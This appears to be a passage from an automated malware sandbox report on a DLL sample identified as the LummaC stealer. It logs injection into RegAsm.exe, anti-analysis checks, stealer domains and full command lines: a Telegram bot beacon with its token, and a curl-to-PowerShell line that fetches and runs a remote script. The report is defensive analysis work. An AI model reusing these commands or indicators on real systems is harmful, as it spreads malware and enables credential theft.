            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 43_2_01443EB4 sldt word ptr [eax]43_2_01443EB4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3861Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2505Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5204
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1292
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4886
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1256
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3846
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3406
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6188Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2553Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6272
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2808
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4871
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3416
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5912
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3726
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dllJump to dropped file
            Source: C:\Windows\System32\loaddll32.exeAPI coverage: 9.6 %
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 7.9 %
            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 8.7 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep count: 3861 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep count: 2505 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -14757395258967632s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1620Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep count: 5204 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 1292 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 4886 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 1256 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 3846 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 3406 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep count: 6188 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep time: -19369081277395017s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 2553 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 6272 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep count: 2808 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 4871 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 3416 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep count: 5912 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep count: 3726 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7328Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7212Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7324Thread sleep time: -150000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7208Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7208Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1740Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1740Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F957B70 FindFirstFileExW,0_2_6F957B70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F957C21 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_6F957C21
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\3D Objects
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Packages
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\CEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Mozilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepub
            Source: powershell.exe, 00000018.00000002.1944765517.0000000007BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
            Source: RegAsm.exe, 0000002B.00000002.2106737861.00000000013B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC?
            Source: curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: RegAsm.exe, 0000002D.00000002.1866051496.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
            Source: powershell.exe, 0000000D.00000002.1712723583.00000000072A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
            Source: RegAsm.exe, RegAsm.exe, 0000002C.00000002.2033166708.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.2033166708.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.1863706840.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.1866051496.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000031.00000002.2170893181.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000031.00000002.2171377376.0000000000D3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 0000000C.00000002.1714250880.0000000007696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714373397.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1770741979.0000000006D7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1953992530.000000000764B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1744169858.0000000003570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1748935916.0000000003180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1987305959.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000003.1795215680.0000000003330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 0000001D.00000002.1894591464.0000000007A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043E110 LdrInitializeThunk,45_2_0043E110
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9525AB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F95955B GetProcessHeap,0_2_6F95955B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9525AB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F954D54 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F954D54
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9520CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6F9520CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F9525AB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6F954D54 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F954D54
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6F9520CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F9520CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F9525AB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F954D54 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F954D54
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F9520CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6F9520CC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
            .NET source code references suspicious native API functions
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Bypasses PowerShell execution policy
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Compiles code for process injection (via .Net compiler)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.csJump to dropped file
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            LummaC encrypted strings found
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
            Source: powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fivenaii.click
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A91008Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 113A008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A8F008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8B2008
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1Jump to behavior
